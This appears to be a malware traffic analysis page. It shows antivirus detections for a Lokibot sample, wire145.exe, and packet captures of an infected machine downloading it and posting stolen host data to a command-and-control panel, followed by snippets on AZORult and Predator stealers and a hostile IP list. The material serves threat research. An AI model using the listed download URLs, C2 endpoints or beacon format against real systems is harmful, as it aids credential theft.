| SHA256: | 6c99dd395a98d20237d05527e84ef8d0d2f9f2a599494ee0632c7bfab2399e33 |
| File name: | wire145.exe |
| Detection ratio: | 37 / 61 |
| Analysis date: | 2017-05-15 02:54:56 UTC ( 0 minutes ago ) |
| Kaspersky | Backdoor.Win32.Androm.ngwk | 20170515 |
| McAfee | Artemis!F65BE5A2E77C | 20170515 |
| McAfee-GW-Edition | BehavesLike.Win32.Virus.th | 20170514 |
| eScan | Trojan.GenericKD.5065116 | 20170515 |
| NANO-Antivirus | Trojan.Win32.Androm.eotpjr | 20170514 |
| Palo Alto Networks (Known Signatures) | generic.ml | 20170515 |
| Panda | Trj/GdSda.A | 20170514 |
| Qihoo-360 | Trojan.Generic | 20170515 |
| Rising | Malware.Generic.3!tfe (cloud:DiQytucAL2U) | 20170515 |
| Sophos | Mal/Generic-S | 20170514 |
| Symantec | Infostealer.Lokibot | 20170514 |
| Tencent | Win32.Trojan.Inject.Auto | 20170515 |
| TrendMicro-HouseCall | Suspicious_GEN.F47V0513 | 20170515 |
| VIPRE | Trojan.Win32.Generic!BT | 20170515 |
| Webroot | W32.Trojan.Gen | 20170515 |
| ZoneAlarm by Check Point | Backdoor.Win32.Androm.ngwk | 20170514 |
2017-05-14 21:26:44.615814 IP 192.168.1.102.58035 > 176.62.8.9.80: Flags [P.], seq 0:394, ack 1, win 256, length 394: HTTP: GET /wire145.exe HTTP/1.1
E…Z.@…$ …f.>. …P…\i.0UP….c..GET /wire145.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: lamela.hr
Connection: Keep-Alive
2017-05-14 21:27:25.906564 IP 192.168.1.102.58037 > 42.112.16.178.80: Flags [P.], seq 0:246, ack 1, win 256, length 246: HTTP: POST /Panel/five/fre.php HTTP/1.0
E…{.@……..f*p…..PV.. M…P…k…POST /Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: ertfghgfhgfh.tk
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: CDE60214
Content-Length: 208
Connection: close
2017-05-14 21:27:26.191163 IP 192.168.1.102.58037 > 42.112.16.178.80: Flags [P.], seq 246:454, ack 1, win 256, length 208: HTTP
E…{.@……..f*p…..PV…M…P…S…..’…….ckav.ru..
…u.s.e.r.n.a.m.e.1.3.4…….W.I.N.-.F.7.0.7.6.K.T.Q.1.P.5…….W.I.N.-.F.7.0.7.6.K.T.Q.1.P.5…………………k……………..0…3.D.F.D.8.1.C.0.7.0.8.A.4.B.C.A.3.3.3.5.F.6.4.B…..dRbP1….
2017-05-14 21:28:04.178218 IP 192.168.1.102.58043 > 8.254.247.46.80: Flags [P.], seq 345:518, ack 24469, win 256, length 173: HTTP: HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1
E…&.@….R…f…….P..O…..P…….HEAD /v9/windowsupdate/redir/muv4wuredir.cab?1705150125 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent
Host: download.windowsupdate.com
2017-05-14 21:30:57.454058 IP 192.168.1.102.58053 > 42.112.16.178.80: Flags [P.], seq 0:246, ack 1, win 256, length 246: HTTP: POST /Panel/five/fre.php HTTP/1.0
E…|.@……..f*p…..P”.z.p.PnP…-…POST /Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: ertfghgfhgfh.tk
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: CDE60214
Content-Length: 181
Connection: close
Written By
2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1 E....=@...wX . ...u-.N.P'&"i....P.@).Q..GET /zxcv.EXE HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozill...
AZORult/RacoonStealer can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. Raccoon is an info...
Predator the Thief is an information stealer, meaning that it is a malware that steals data from infected systems. This virus can access the camera and spy on victims, steal passwords and login information as well as retrieve payment data from cryptocurrency wallet...
Hostile IPs: 172.217.164.131 172.217.9.206 172.253.63.132 188.127.249.210 195.201.225.248 217.8.117.45 34.107.4.68 91.193.75.172 96.6.6.64 Dynamic Analysis Report Classification:DownloaderSpyware Threat Names:AZORult v3Gen:Varian...
